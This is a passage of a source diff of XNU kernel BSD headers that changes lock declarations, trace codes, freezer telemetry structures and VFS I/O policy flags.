*dl_thread; - dev_t dl_dev; - int dl_mode; -} *devsw_lock_t; - #endif /* BSD_KERNEL_PRIVATE */ @@ -295,7 +287,6 @@ extern struct swdevt swdevt[]; */ __BEGIN_DECLS #ifdef KERNEL_PRIVATE -void devsw_init(void); extern struct cdevsw cdevsw[]; extern int cdevsw_setkqueueok(int, const struct cdevsw*, int); #endif /* KERNEL_PRIVATE */ diff --git a/bsd/sys/dtrace_impl.h b/bsd/sys/dtrace_impl.h index bb70011d2..e1ab6a060 100644 --- a/bsd/sys/dtrace_impl.h +++ b/bsd/sys/dtrace_impl.h @@ -50,6 +50,8 @@ extern "C" { /* * DTrace Implementation Locks */ +extern lck_attr_t dtrace_lck_attr; +extern lck_grp_t dtrace_lck_grp; extern lck_mtx_t dtrace_procwaitfor_lock; /* @@ -1395,7 +1397,6 @@ extern void dtrace_probe_error(dtrace_state_t *, dtrace_epid_t, int, int, extern int dtrace_assfail(const char *, const char *, int); extern int dtrace_attached(void); extern hrtime_t dtrace_gethrestime(void); -extern void dtrace_isa_init(void); extern void dtrace_flush_caches(void); diff --git a/bsd/sys/event.h b/bsd/sys/event.h index cd76a0528..21552dd6b 100644 --- a/bsd/sys/event.h +++ b/bsd/sys/event.h @@ -676,10 +676,6 @@ SLIST_HEAD(klist, knote); #include /* panic */ #include -#ifdef MALLOC_DECLARE -MALLOC_DECLARE(M_KQUEUE); -#endif - LIST_HEAD(knote_list, knote); TAILQ_HEAD(kqtailq, knote); /* a list of "queued" events */ diff --git a/bsd/sys/eventhandler.h b/bsd/sys/eventhandler.h index 307546942..0f8ae79fc 100644 --- a/bsd/sys/eventhandler.h +++ b/bsd/sys/eventhandler.h @@ -65,8 +65,8 @@ #include extern int evh_debug; -extern lck_grp_t *el_lock_grp; -extern lck_attr_t *el_lock_attr; +extern lck_grp_t el_lock_grp; +extern lck_attr_t el_lock_attr; extern struct eventhandler_entry_arg eventhandler_entry_dummy_arg; struct eventhandler_lists_ctxt { @@ -101,13 +101,13 @@ struct eventhandler_list { typedef struct eventhandler_entry *eventhandler_tag; -#define EHL_LOCK_INIT(p) lck_mtx_init(&(p)->el_lock, el_lock_grp, el_lock_attr) +#define EHL_LOCK_INIT(p) lck_mtx_init(&(p)->el_lock, &el_lock_grp, &el_lock_attr) #define EHL_LOCK(p) lck_mtx_lock(&(p)->el_lock) #define EHL_LOCK_SPIN(p) lck_mtx_lock_spin(&(p)->el_lock) #define EHL_LOCK_CONVERT(p) lck_mtx_convert_spin(&(p)->el_lock) #define EHL_UNLOCK(p) lck_mtx_unlock(&(p)->el_lock) #define EHL_LOCK_ASSERT(p, x) LCK_MTX_ASSERT(&(p)->el_lock, x) -#define EHL_LOCK_DESTROY(p) lck_mtx_destroy(&(p)->el_lock, el_lock_grp) +#define EHL_LOCK_DESTROY(p) lck_mtx_destroy(&(p)->el_lock, &el_lock_grp) #define evhlog(x) do { if (evh_debug >= 1) log x; } while (0) diff --git a/bsd/sys/imageboot.h b/bsd/sys/imageboot.h index 07299c21d..3c961ab23 100644 --- a/bsd/sys/imageboot.h +++ b/bsd/sys/imageboot.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2006-2010 Apple Inc. All rights reserved. + * Copyright (c) 2006-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -42,7 +42,8 @@ bool imageboot_desired(void); void imageboot_setup(imageboot_type_t type); int imageboot_format_is_valid(const char *root_path); int imageboot_mount_image(const char *root_path, int height, imageboot_type_t type); -int imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, const char *outgoing_root_path, const bool rooted_dmg); +int imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, + const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check); int imageboot_read_file(struct kalloc_heap *kheap, const char *path, void **bufp, size_t *bufszp); int imageboot_read_file_from_offset(struct kalloc_heap *kheap, const char *path, off_t offset, void **bufp, size_t *bufszp); diff --git a/bsd/sys/kasl.h b/bsd/sys/kasl.h index 1320d65be..e11b773cb 100644 --- a/bsd/sys/kasl.h +++ b/bsd/sys/kasl.h @@ -40,7 +40,6 @@ extern int kern_asl_msg(int level, const char *facility, size_t num_pairs, ...); extern int escape_str(char *str, size_t len, size_t buflen); -extern void fpxlog_init(void); extern void fpxlog(int, uint32_t, uint32_t, uint32_t); #endif /* !_SYS_KASL_H_ */ diff --git a/bsd/sys/kauth.h b/bsd/sys/kauth.h index 66cb12e92..3c6cd105c 100644 --- a/bsd/sys/kauth.h +++ b/bsd/sys/kauth.h @@ -782,15 +782,19 @@ void kprintf(const char *fmt, ...); /* * Initialisation. */ -extern lck_grp_t *kauth_lck_grp; #ifdef XNU_KERNEL_PRIVATE __BEGIN_DECLS + +extern lck_grp_t kauth_lck_grp; + extern void kauth_init(void); extern void kauth_cred_init(void); +/* + * If you need accounting for KM_KAUTH consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_KAUTH KHEAP_DEFAULT #if CONFIG_EXT_RESOLVER -extern void kauth_identity_init(void); -extern void kauth_groups_init(void); -extern void kauth_resolver_init(void); extern void kauth_resolver_identity_reset(void); #endif __END_DECLS diff --git a/bsd/sys/kdebug.h b/bsd/sys/kdebug.h index f45871353..3fbe03b94 100644 --- a/bsd/sys/kdebug.h +++ b/bsd/sys/kdebug.h @@ -182,6 +182,7 @@ __BEGIN_DECLS #define DBG_MACH_SCHED_CLUTCH 0xA9 /* Clutch scheduler */ #define DBG_MACH_IO 0xAA /* I/O */ #define DBG_MACH_WORKGROUP 0xAB /* Workgroup subsystem */ +#define DBG_MACH_HV 0xAC /* Hypervisor subsystem */ /* Codes for DBG_MACH_IO */ #define DBC_MACH_IO_MMIO_READ 0x1 @@ -260,6 +261,8 @@ __BEGIN_DECLS #define MACH_TURNSTILE_KERNEL_CHANGE 0x40 /* sched priority change because of turnstile */ #define MACH_SCHED_WI_AUTO_JOIN 0x41 /* work interval auto join events */ #define MACH_SCHED_WI_DEFERRED_FINISH 0x42 /* work interval pending finish events for auto-join thread groups */ +#define MACH_SET_RT_DEADLINE 0x43 /* set thread->realtime.deadline */ +#define MACH_CANCEL_RT_DEADLINE 0x44 /* cancel thread->realtime.deadline */ #define MACH_PSET_AVG_EXEC_TIME 0x50 /* Codes for Clutch/Edge Scheduler (DBG_MACH_SCHED_CLUTCH) */ @@ -360,6 +363,13 @@ __BEGIN_DECLS #define PMAP__UPDATE_CACHING 0x15 #define PMAP__ATTRIBUTE_CLEAR_RANGE 0x16 #define PMAP__CLEAR_USER_TTB 0x17 +#define PMAP__IOMMU_INIT 0x18 +#define PMAP__IOMMU_IOVMALLOC 0x19 +#define PMAP__IOMMU_IOVMFREE 0x1a +#define PMAP__IOMMU_MAP 0x1b +#define PMAP__IOMMU_UNMAP 0x1c +#define PMAP__IOMMU_IOCTL 0x1d +#define PMAP__IOMMU_GRANT_PAGE 0x1e /* Codes for clock (DBG_MACH_CLOCK) */ #define MACH_EPOCH_CHANGE 0x0 /* wake epoch change */ @@ -420,6 +430,10 @@ __BEGIN_DECLS #define RMON_LOGWRITES_VIOLATED_K32B 0x025 #define RMON_DISABLE_IO_MONITOR 0x02f +/* Codes for Hypervisor (DBG_MACH_HV) */ +#define HV_GUEST_ENTER 0x000 +#define HV_GUEST_ERROR 0x001 + /* **** The Kernel Debug Sub Classes for Network (DBG_NETWORK) **** */ #define DBG_NETIP 1 /* Internet Protocol */ #define DBG_NETARP 2 /* Address Resolution Protocol */ @@ -570,6 +584,11 @@ __BEGIN_DECLS #define DBG_HFS_UPDATE_MINOR 0x40 #define DBG_HFS_UPDATE_SKIPPED 0x80 +/* + * Codes for Kernel Debug Sub Class DBG_VFS + */ +#define DBG_VFS_IO_COMPRESSION_STATS 0x1000 + /* The Kernel Debug Sub Classes for BSD */ #define DBG_BSD_PROC 0x01 /* process/signals related */ #define DBG_BSD_MEMSTAT 0x02 /* memorystatus / jetsam operations */ diff --git a/bsd/sys/kern_memorystatus.h b/bsd/sys/kern_memorystatus.h index 4cbfd6b8f..8db45d65e 100644 --- a/bsd/sys/kern_memorystatus.h +++ b/bsd/sys/kern_memorystatus.h @@ -364,7 +364,7 @@ int memorystatus_control(uint32_t command, int32_t pid, uint32_t flags, void *bu #define MEMORYSTATUS_CMD_INCREASE_JETSAM_TASK_LIMIT 22 /* Used by DYLD to increase the jetsam active and inactive limits, when using roots */ #if PRIVATE -#define MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP 23 /* Used by unit tests in the development kernel only. */ +#define MEMORYSTATUS_CMD_SET_TESTING_PID 23 /* Used by unit tests in the development kernel only. */ #endif /* PRIVATE */ #define MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN 24 /* Check if the process is frozen. */ @@ -402,8 +402,8 @@ typedef struct memorystatus_jetsam_panic_options { #define MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY 0x10 /* Set probability of use for a group of processes */ #if PRIVATE -#define MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP 0x20 /* Only used by xnu unit tests. */ -#define MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP 0x40 /* Only used by xnu unit tests. */ +#define MEMORYSTATUS_FLAGS_SET_TESTING_PID 0x20 /* Only used by xnu unit tests. */ +#define MEMORYSTATUS_FLAGS_UNSET_TESTING_PID 0x40 /* Only used by xnu unit tests. */ #endif /* PRIVATE */ #define MEMORYSTATUS_FLAGS_SNAPSHOT_FREEZER 0x80 /* A snapshot buffer containing app kills since last consumption */ diff --git a/bsd/sys/kern_memorystatus_freeze.h b/bsd/sys/kern_memorystatus_freeze.h index dd01e09ce..c962d0949 100644 --- a/bsd/sys/kern_memorystatus_freeze.h +++ b/bsd/sys/kern_memorystatus_freeze.h @@ -58,6 +58,7 @@ extern unsigned int memorystatus_freeze_private_shared_pages_ratio; /* Ratio of extern unsigned int memorystatus_suspended_count; extern unsigned int memorystatus_thaw_count; /* # of processes that have been thawed in the current interval. */ extern unsigned int memorystatus_refreeze_eligible_count; /* # of processes currently thawed i.e. have state on disk & in-memory */ +extern uint32_t memorystatus_freeze_current_interval; /* Monotonically increasing interval id. */ void memorystatus_freeze_init(void); extern int memorystatus_freeze_process_sync(proc_t p); @@ -115,6 +116,67 @@ int memorystatus_freezer_control(int32_t flags, user_addr_t buffer, size_t buffe void memorystatus_freeze_init_proc(proc_t p); errno_t memorystatus_get_process_is_frozen(pid_t pid, int *is_freezable); +/* Freezer counters collected for telemtry */ +struct memorystatus_freezer_stats_t { + /* + * # of processes that we've considered freezing. + * Used to normalize the error reasons below. + */ + uint64_t mfs_process_considered_count; + + /* + * The following counters track how many times we've failed to freeze + * a process because of a specific FREEZER_ERROR. + */ + /* EXCESS_SHARED_MEMORY */ + uint64_t mfs_error_excess_shared_memory_count; + /* LOW_PRIVATE_SHARED_RATIO */ + uint64_t mfs_error_low_private_shared_ratio_count; + /* NO_COMPRESSOR_SPACE */ + uint64_t mfs_error_no_compressor_space_count; + /* NO_SWAP_SPACE */ + uint64_t mfs_error_no_swap_space_count; + /* pages < memorystatus_freeze_pages_min */ + uint64_t mfs_error_below_min_pages_count; + /* dasd determined it was unlikely to be relaunched. */ + uint64_t mfs_error_low_probability_of_use_count; + /* transient reasons (like inability to acquire a lock). */ + uint64_t mfs_error_other_count; + + /* + * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold. + * Used to normalize skipped_full_count and shared_mb_high_count. + */ + uint64_t mfs_below_threshold_count; + + /* Skipped running the freezer because we were out of slots */ + uint64_t mfs_skipped_full_count; + + /* Skipped running the freezer because we were over the shared mb limit*/ + uint64_t mfs_skipped_shared_mb_high_count; + + /* + * How many pages have not been sent to swap because they were in a shared object? + * This is being used to gather telemtry so we can understand the impact we'd have + * on our NAND budget if we did swap out these pages. + */ + uint64_t mfs_shared_pages_skipped; + + /* + * A running sum of the total number of bytes sent to NAND during + * refreeze operations since boot. + */ + uint64_t mfs_bytes_refrozen; + /* The number of refreeze operations since boot */ + uint64_t mfs_refreeze_count; + + /* The number of proceses which have been frozen at least once in the current interval. */ + uint64_t mfs_processes_frozen; + /* THe number of processes which have been thawed at least once in the current interval. */ + uint64_t mfs_processes_thawed; +}; +extern struct memorystatus_freezer_stats_t memorystatus_freezer_stats; + #endif /* CONFIG_FREEZE */ #endif /* XNU_KERNEL_PRIVATE */ diff --git a/bsd/sys/lockf.h b/bsd/sys/lockf.h index 574ef7a70..8dc82f313 100644 --- a/bsd/sys/lockf.h +++ b/bsd/sys/lockf.h @@ -69,10 +69,6 @@ struct vnop_advlock_args; struct vnode; -#ifdef MALLOC_DECLARE -MALLOC_DECLARE(M_LOCKF); -#endif - #if IMPORTANCE_INHERITANCE #define LF_NOT_BOOSTED 0 #define LF_BOOSTED 1 diff --git a/bsd/sys/malloc.h b/bsd/sys/malloc.h index 4bf21625f..62c2a4085 100644 --- a/bsd/sys/malloc.h +++ b/bsd/sys/malloc.h @@ -144,6 +144,12 @@ ZONE_VIEW_DECLARE(ZV_NAMEI); #define M_LAST 129 /* Must be last type + 1 */ +/* + * If you need accounting consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_SHM KHEAP_DEFAULT + #define MALLOC(space, cast, size, type, flags) \ ({ VM_ALLOC_SITE_STATIC(0, 0); \ (space) = (cast)__MALLOC(size, type, flags, &site); }) diff --git a/bsd/sys/mbuf.h b/bsd/sys/mbuf.h index 0e8be447e..802e54672 100644 --- a/bsd/sys/mbuf.h +++ b/bsd/sys/mbuf.h @@ -694,6 +694,9 @@ struct mbuf { /* checksum start adjustment has been done */ #define CSUM_ADJUST_DONE 0x00020000 +/* VLAN encapsulation present */ +#define CSUM_VLAN_ENCAP_PRESENT 0x00040000 /* mbuf has vlan encapsulation */ + /* TCP Segment Offloading requested on this mbuf */ #define CSUM_TSO_IPV4 0x00100000 /* This mbuf needs to be segmented by the NIC */ #define CSUM_TSO_IPV6 0x00200000 /* This mbuf needs to be segmented by the NIC */ @@ -1079,6 +1082,7 @@ struct mbstat { u_int32_t m_bigclusters; /* clusters obtained from page pool */ u_int32_t m_bigclfree; /* free clusters */ u_int32_t m_bigmclbytes; /* length of an mbuf cluster */ + u_int32_t m_forcedefunct; /* times we force defunct'ed an app's sockets */ }; /* Compatibillity with 10.3 */ diff --git a/bsd/sys/mcache.h b/bsd/sys/mcache.h index 243965bd7..4fd209c37 100644 --- a/bsd/sys/mcache.h +++ b/bsd/sys/mcache.h @@ -306,23 +306,17 @@ typedef struct mcache { u_int32_t mc_nwretry_cnt; /* # of no-wait retry attempts */ u_int32_t mc_nwfail_cnt; /* # of no-wait retries that failed */ decl_lck_mtx_data(, mc_sync_lock); /* protects purges and reenables */ - lck_attr_t *mc_sync_lock_attr; lck_grp_t *mc_sync_lock_grp; - lck_grp_attr_t *mc_sync_lock_grp_attr; /* * Keep CPU and buckets layers lock statistics separate. */ - lck_attr_t *mc_cpu_lock_attr; lck_grp_t *mc_cpu_lock_grp; - lck_grp_attr_t *mc_cpu_lock_grp_attr; /* * Bucket layer common to all CPUs */ decl_lck_mtx_data(, mc_bkt_lock); - lck_attr_t *mc_bkt_lock_attr; lck_grp_t *mc_bkt_lock_grp; - lck_grp_attr_t *mc_bkt_lock_grp_attr; mcache_bkttype_t *cache_bkttype; /* bucket type */ mcache_bktlist_t mc_full; /* full buckets */ mcache_bktlist_t mc_empty; /* empty buckets */ @@ -357,6 +351,8 @@ typedef struct mcache { #define MCA_TRN_MAX 2 /* Number of transactions to record */ +#define DUMP_MCA_BUF_SIZE 512 + typedef struct mcache_audit { struct mcache_audit *mca_next; /* next audit struct */ void *mca_addr; /* address of buffer */ @@ -404,7 +400,7 @@ __private_extern__ void mcache_audit_free_verify(mcache_audit_t *, void *, size_t, size_t); __private_extern__ void mcache_audit_free_verify_set(mcache_audit_t *, void *, size_t, size_t); -__private_extern__ char *mcache_dump_mca(mcache_audit_t *); +__private_extern__ char *mcache_dump_mca(char buf[DUMP_MCA_BUF_SIZE], mcache_audit_t *); __private_extern__ void mcache_audit_panic(mcache_audit_t *, void *, size_t, int64_t, int64_t) __abortlike; diff --git a/bsd/sys/mman.h b/bsd/sys/mman.h index a6e093f59..4ec0f06f3 100644 --- a/bsd/sys/mman.h +++ b/bsd/sys/mman.h @@ -288,7 +288,6 @@ __END_DECLS #else /* KERNEL */ #ifdef XNU_KERNEL_PRIVATE void pshm_cache_init(void); /* for bsd_init() */ -void pshm_lock_init(void); /* * XXX routine exported by posix_shm.c, but never used there, only used in diff --git a/bsd/sys/monotonic.h b/bsd/sys/monotonic.h index 6ec648972..bbf766904 100644 --- a/bsd/sys/monotonic.h +++ b/bsd/sys/monotonic.h @@ -176,7 +176,7 @@ __BEGIN_DECLS #define MT_KDBG_TMPTH_START(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_START) #define MT_KDBG_TMPTH_END(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_END) -extern lck_grp_t * mt_lock_grp; +extern lck_grp_t mt_lock_grp; int mt_dev_init(void); diff --git a/bsd/sys/mount.h b/bsd/sys/mount.h index 6ff9616b3..f9b9a1480 100644 --- a/bsd/sys/mount.h +++ b/bsd/sys/mount.h @@ -1334,6 +1334,7 @@ void * vfs_mntlabel(mount_t mp); /* Safe to cast to "struct label*"; returns "v void vfs_setcompoundopen(mount_t mp); uint64_t vfs_throttle_mask(mount_t mp); int vfs_isswapmount(mount_t mp); +int vfs_context_dataless_materialization_is_prevented(vfs_context_t); boolean_t vfs_context_is_dataless_manipulator(vfs_context_t); boolean_t vfs_context_can_resolve_triggers(vfs_context_t); void vfs_setmntsystem(mount_t mp); diff --git a/bsd/sys/mount_internal.h b/bsd/sys/mount_internal.h index 2af3a1283..f3f0526a4 100644 --- a/bsd/sys/mount_internal.h +++ b/bsd/sys/mount_internal.h @@ -474,7 +474,7 @@ typedef uint32_t vfs_switch_root_flags_t; int vfs_switch_root(const char *, const char *, vfs_switch_root_flags_t); int vfs_mountroot(void); -void vfs_unmountall(void); +void vfs_unmountall(int only_non_system); int safedounmount(struct mount *, int, vfs_context_t); int dounmount(struct mount *, int, int, vfs_context_t); void dounmount_submounts(struct mount *, int, vfs_context_t); @@ -502,6 +502,7 @@ void mount_iterreset(mount_t); #define KERNEL_MOUNT_PREBOOTVOL 0x20 /* mount the Preboot volume */ #define KERNEL_MOUNT_RECOVERYVOL 0x40 /* mount the Recovery volume */ #define KERNEL_MOUNT_BASESYSTEMROOT 0x80 /* mount a base root volume "instead of" the full root volume (only used during bsd_init) */ +#define KERNEL_MOUNT_DEVFS 0x100 /* kernel startup mount of devfs */ /* mask for checking if any of the "mount volume by role" flags are set */ #define KERNEL_MOUNT_VOLBYROLE_MASK (KERNEL_MOUNT_DATAVOL | KERNEL_MOUNT_VMVOL | KERNEL_MOUNT_PREBOOTVOL | KERNEL_MOUNT_RECOVERYVOL) @@ -529,8 +530,6 @@ void rethrottle_thread(uthread_t ut); extern int num_trailing_0(uint64_t n); /* sync lock */ -extern lck_mtx_t * sync_mtx_lck; - extern int sync_timeout_seconds; extern zone_t mount_zone; diff --git a/bsd/sys/munge.h b/bsd/sys/munge.h index 43c30b05f..f714a61d9 100644 --- a/bsd/sys/munge.h +++ b/bsd/sys/munge.h @@ -169,6 +169,7 @@ void munge_wws(void *args); void munge_wwws(void *args); void munge_wwwsw(void *args); void munge_llllll(void *args); +void munge_llll(void *args); void munge_l(void *args); void munge_ll(void *args); void munge_lw(void *args); diff --git a/bsd/sys/proc.h b/bsd/sys/proc.h index 34c019cef..dadd3349d 100644 --- a/bsd/sys/proc.h +++ b/bsd/sys/proc.h @@ -87,6 +87,10 @@ #include /* COALITION_NUM_TYPES */ #endif +#ifndef KERNEL +#include +#endif + #if defined(XNU_KERNEL_PRIVATE) || !defined(KERNEL) struct session; @@ -410,6 +414,9 @@ extern boolean_t proc_is_translated(proc_t); /* true if the process ignores errors from content protection APIs */ extern bool proc_ignores_content_protection(proc_t proc); +/* true if the file system shouldn't update mtime for operations by the process */ +extern bool proc_skip_mtime_update(proc_t proc); + /*! * @function proc_exitstatus * @abstract KPI to determine a process's exit status. @@ -498,8 +505,10 @@ __BEGIN_DECLS int pid_suspend(int pid); int pid_resume(int pid); -int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t); -int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t); +__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3)) +int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t); /* Returns task inspect port */ +__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3)) +int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t); /* Returns task read port */ #if defined(__arm__) || defined(__arm64__) int pid_hibernate(int pid); diff --git a/bsd/sys/proc_internal.h b/bsd/sys/proc_internal.h index 46a610413..4c6ceb04c 100644 --- a/bsd/sys/proc_internal.h +++ b/bsd/sys/proc_internal.h @@ -404,6 +404,7 @@ struct proc { uint32_t p_memstat_freeze_sharedanon_pages; /* shared pages left behind after freeze */ uint32_t p_memstat_frozen_count; uint32_t p_memstat_thaw_count; + uint32_t p_memstat_last_thaw_interval; /* In which freezer interval was this last thawed? */ #endif /* CONFIG_FREEZE */ #endif /* CONFIG_MEMORYSTATUS */ @@ -526,7 +527,10 @@ struct proc_ident { #define P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME 0x0008 #define P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE 0x0010 #define P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION 0x0020 -#define P_VFS_IOPOLICY_VALID_MASK (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION) +#define P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS 0x0040 +#define P_VFS_IOPOLICY_SKIP_MTIME_UPDATE 0x0080 +#define P_VFS_IOPOLICY_VALID_MASK (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | \ + P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION | P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS | P_VFS_IOPOLICY_SKIP_MTIME_UPDATE) /* process creation arguments */ #define PROC_CREATE_FORK 0 /* independent child (running) */ @@ -690,8 +694,7 @@ extern unsigned int proc_shutdown_exitcount; #define PID_MAX 99999 #define NO_PID 100000 -extern lck_mtx_t * proc_list_mlock; -extern lck_mtx_t * proc_klist_mlock; +extern lck_mtx_t proc_list_mlock; #define BSD_SIMUL_EXECS 33 /* 32 , allow for rounding */ #define BSD_PAGEABLE_SIZE_PER_EXEC (NCARGS + PAGE_SIZE + PAGE_SIZE) /* page for apple vars, page for executable header */ @@ -712,16 +715,15 @@ extern u_long pgrphash; extern LIST_HEAD(sesshashhead, session) * sesshashtbl; extern u_long sesshash; -extern lck_grp_t * proc_lck_grp; -extern lck_grp_t * proc_fdmlock_grp; -extern lck_grp_t * proc_kqhashlock_grp; -extern lck_grp_t * proc_knhashlock_grp; -extern lck_grp_t * proc_mlock_grp; -extern lck_grp_t * proc_ucred_mlock_grp; -extern lck_grp_t * proc_slock_grp; -extern lck_grp_t * proc_dirslock_grp; -extern lck_grp_attr_t * proc_lck_grp_attr; -extern lck_attr_t * proc_lck_attr; +extern lck_attr_t proc_lck_attr; +extern lck_grp_t proc_fdmlock_grp; +extern lck_grp_t proc_lck_grp; +extern lck_grp_t proc_kqhashlock_grp; +extern lck_grp_t proc_knhashlock_grp; +extern lck_grp_t proc_slock_grp; +extern lck_grp_t proc_mlock_grp; +extern lck_grp_t proc_ucred_mlock_grp; +extern lck_grp_t proc_dirslock_grp; LIST_HEAD(proclist, proc); extern struct proclist allproc; /* List of all processes. */ @@ -920,4 +922,10 @@ extern zone_t proc_sigacts_zone; extern struct proc_ident proc_ident(proc_t p); +/* + * True if the process ignores file permissions in case it owns the + * file/directory + */ +bool proc_ignores_node_permissions(proc_t proc); + #endif /* !_SYS_PROC_INTERNAL_H_ */ diff --git a/bsd/sys/pthread_shims.h b/bsd/sys/pthread_shims.h index e956225b2..1d28e90f9 100644 --- a/bsd/sys/pthread_shims.h +++ b/bsd/sys/pthread_shims.h @@ -202,7 +202,7 @@ typedef const struct pthread_callbacks_s { /* osfmk/vm/vm_map.h */ kern_return_t (*vm_map_page_info)(vm_map_t map, vm_map_offset_t offset, vm_page_info_flavor_t flavor, vm_page_info_t info, mach_msg_type_number_t *count); - void *__unused_was_vm_map_switch; + mach_port_name_t (*ipc_port_copyout_send_pinned)(ipc_port_t sright, ipc_space_t space); /* wq functions */ kern_return_t (*thread_set_wq_state32)(thread_t thread, thread_state_t state); @@ -291,14 +291,14 @@ typedef const struct pthread_callbacks_s { uint16_t (*thread_set_tag)(thread_t thread, uint16_t tag); uint16_t (*thread_get_tag)(thread_t thread); - void *__unused_was_proc_usynch_thread_qos_squash_override_for_resource; - void *__unused_was_task_get_default_manager_qos; - void *__unused_was_thread_create_workq_waiting; + kern_return_t (*thread_create_pinned)(task_t parent_task, thread_t *new_thread); + kern_return_t (*thread_terminate_pinned)(thread_t thread); + ipc_port_t (*convert_thread_to_port_pinned)(thread_t th); user_addr_t (*proc_get_stack_addr_hint)(struct proc *p); void (*proc_set_stack_addr_hint)(struct proc *p, user_addr_t stack_addr_hint); - void *__unused_was_proc_get_return_to_kernel_offset; + kern_return_t (*thread_create_immovable)(task_t parent_task, thread_t *new_thread); void (*proc_set_return_to_kernel_offset)(struct proc *t, uint64_t offset); void *__unused_was_workloop_fulfill_threadreq; diff --git a/bsd/sys/quota.h b/bsd/sys/quota.h index 08fcfd7ac..cecc86d70 100644 --- a/bsd/sys/quota.h +++ b/bsd/sys/quota.h @@ -353,7 +353,6 @@ void dqfileclose(struct quotafile *, int); void dqflush(struct vnode *); int dqget(u_int32_t, struct quotafile *, int, struct dquot **); void dqhashinit(void); -void dqinit(void); int dqisinitialized(void); void dqref(struct dquot *); void dqrele(struct dquot *); diff --git a/bsd/sys/resource.h b/bsd/sys/resource.h index b3baf8421..e3b86028a 100644 --- a/bsd/sys/resource.h +++ b/bsd/sys/resource.h @@ -547,6 +547,8 @@ struct proc_rlimit_control_wakeupmon { #define IOPOL_TYPE_VFS_STATFS_NO_DATA_VOLUME 4 #define IOPOL_TYPE_VFS_TRIGGER_RESOLVE 5 #define IOPOL_TYPE_VFS_IGNORE_CONTENT_PROTECTION 6 +#define IOPOL_TYPE_VFS_IGNORE_PERMISSIONS 7 +#define IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE 8 /* scope */ #define IOPOL_SCOPE_PROCESS 0 @@ -586,6 +588,12 @@ struct proc_rlimit_control_wakeupmon { #define IOPOL_VFS_CONTENT_PROTECTION_DEFAULT 0 #define IOPOL_VFS_CONTENT_PROTECTION_IGNORE 1 +#define IOPOL_VFS_IGNORE_PERMISSIONS_OFF 0 +#define IOPOL_VFS_IGNORE_PERMISSIONS_ON 1 + +#define IOPOL_VFS_SKIP_MTIME_UPDATE_OFF 0 +#define IOPOL_VFS_SKIP_MTIME_UPDATE_ON 1 + #ifdef PRIVATE /* * Structures for use in communicating via iopolicysys() between Libc and the diff --git a/bsd/sys/sbuf.h b/bsd/sys/sbuf.h index a86f6f765..2c3544bf8 100644 --- a/bsd/sys/sbuf.h +++ b/bsd/sys/sbuf.h @@ -74,12 +74,6 @@ int sbuf_done(struct sbuf *); void sbuf_delete(struct sbuf *); #endif -#ifdef KERNEL -struct uio; -struct sbuf *sbuf_uionew(struct sbuf *, struct uio *, int *); -int sbuf_bcopyin(struct sbuf *, const void *, size_t); -int sbuf_copyin(struct sbuf *, const void *, size_t); -#endif __END_DECLS #endif diff --git a/bsd/sys/select.h b/bsd/sys/select.h index 2fb516833..27ad0c3c2 100644 --- a/bsd/sys/select.h +++ b/bsd/sys/select.h @@ -139,6 +139,10 @@ extern int selwait; void selrecord(proc_t selector, struct selinfo *, void *); void selwakeup(struct selinfo *); void selthreadclear(struct selinfo *); +#if XNU_KERNEL_PRIVATE +struct _select; +void select_cleanup_uthread(struct _select *); +#endif __END_DECLS diff --git a/bsd/sys/semaphore.h b/bsd/sys/semaphore.h index b55852012..7dc1085fd 100644 --- a/bsd/sys/semaphore.h +++ b/bsd/sys/semaphore.h @@ -62,7 +62,6 @@ int sem_wait(sem_t *) __DARWIN_ALIAS_C(sem_wait); __END_DECLS #else /* KERNEL */ -void psem_lock_init(void); void psem_cache_init(void); #endif /* KERNEL */ diff --git a/bsd/sys/socketvar.h b/bsd/sys/socketvar.h index c5124169a..c1e664187 100644 --- a/bsd/sys/socketvar.h +++ b/bsd/sys/socketvar.h @@ -85,6 +85,9 @@ #include #endif /* BSD_KERNEL_PRIVATE */ #endif /* KERNEL_PRIVATE */ +#if !KERNEL +#include +#endif typedef u_quad_t so_gen_t; @@ -433,7 +436,7 @@ struct xsocket { uid_t so_uid; /* XXX */ }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && 